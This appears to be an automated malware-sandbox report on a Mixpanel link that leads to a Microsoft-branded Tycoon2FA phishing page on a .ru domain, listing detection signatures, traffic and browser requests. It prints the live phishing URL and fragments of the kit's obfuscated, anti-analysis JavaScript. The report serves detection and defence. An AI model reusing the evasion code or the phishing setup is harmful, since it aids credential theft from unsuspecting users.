Edit tour

Windows Analysis Report
https://mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi

Overview

General Information

Sample URL:https://mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi
Analysis ID:1649398
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Phisher
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12619626058332868800,6865025498761926618,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_191JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_216JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      SourceRuleDescriptionAuthorStrings
      3.26.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        3.26.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          3.27.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            3.30.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              3.27.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
                Click to see the 16 entries
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'zyvk.fgaiuin.ru' does not match the legitimate domain for Microsoft., The domain 'fgaiuin.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for Microsoft., The URL contains no direct reference to Microsoft, which is suspicious given the brand association., The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information, which is common in phishing sites. DOM: 4.5.pages.csv
                Source: Yara matchFile source: 4.6.pages.csv, type: HTML
                Source: Yara matchFile source: 4.5.pages.csv, type: HTML
                Source: Yara matchFile source: 3.27.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.3.pages.csv, type: HTML
                Source: Yara matchFile source: 3.27.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.31..script.csv, type: HTML
                Source: Yara matchFile source: 3.3.pages.csv, type: HTML
                Source: Yara matchFile source: 4.45..script.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_216, type: DROPPED
                Source: Yara matchFile source: dropped/chromecache_191, type: DROPPED
                Source: Yara matchFile source: 4.42.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.26.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.30.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.34.d.script.csv, type: HTML
                Source: Yara matchFile source: 4.37..script.csv, type: HTML
                Source: Yara matchFile source: 4.38..script.csv, type: HTML
                Source: Yara matchFile source: 4.6.pages.csv, type: HTML
                Source: Yara matchFile source: 4.5.pages.csv, type: HTML
                Source: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiJoe Sandbox AI: Page contains button: 'OPEN DOCUMENT' Source: '0.2.pages.csv'
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: Number of links: 0
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function wgvqNSgMAG(event) { co...
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: Title: Login To Your Secure Portal does not match URL
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: Invalid link: Terms of use
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: Invalid link: Privacy & cookies
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "q1x7k";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/app1i1v3t06sabzw9mvtib0mq1byc8awtydbw1cc5cjbgyfg4rbstbloihpj8";var gdf = "/ijv8ixsgrcdbcx0uvmm6wwp9gmuvhzznb4tunoqjab119";var odf = "/ij6s2a6jaz36po2viqch7efrwxbrpa0mmyezyygvoslxcd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/...
                Source: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/HTTP Parser: function amkoarwduw(){tvlvqjyvjo = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: <input type="password" .../> found
                Source: https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/HTTP Parser: No favicon
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: No favicon
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: No <meta name="author".. found
                Source: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNHTTP Parser: No <meta name="copyright".. found
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.86.251.28:443 -> 192.168.2.18:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49873 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49877 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49880 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49882 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49884 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49910 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49912 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49947 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49953 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49956 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49965 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50003 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50004 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50008 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50011 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50010 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50016 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50017 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.18:50040 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50051 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.18:50055 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.175.175.74:443 -> 192.168.2.18:50060 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.225.45.182:443 -> 192.168.2.18:50065 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.86.181.185:443 -> 192.168.2.18:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 130.211.5.208:443 -> 192.168.2.18:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.86.181.185:443 -> 192.168.2.18:50077 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.156.36:443 -> 192.168.2.18:50094 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.156.36:443 -> 192.168.2.18:50095 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.235.36.35:443 -> 192.168.2.18:50100 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.235.36.35:443 -> 192.168.2.18:50101 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50103 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.18:50107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.18:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.18:50119 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.18:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50128 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50140 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50141 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50139 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.18:50138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.18:50149 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:50174 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:50173 version: TLS 1.2
                Source: chrome.exeMemory has grown: Private usage: 12MB later: 36MB
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.28
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.172
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.172
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mi&oit=1&cp=2&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mix&oit=1&cp=3&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixp&oit=1&cp=4&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpa&oit=1&cp=5&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpan&oit=1&cp=6&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpane&oit=1&cp=7&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel&oit=1&cp=8&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.&oit=1&cp=9&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.c&oit=1&cp=10&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com&oit=3&cp=12&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2F&oit=3&cp=13&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp&oit=3&cp=14&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2F&oit=3&cp=15&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFW&oit=3&cp=17&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
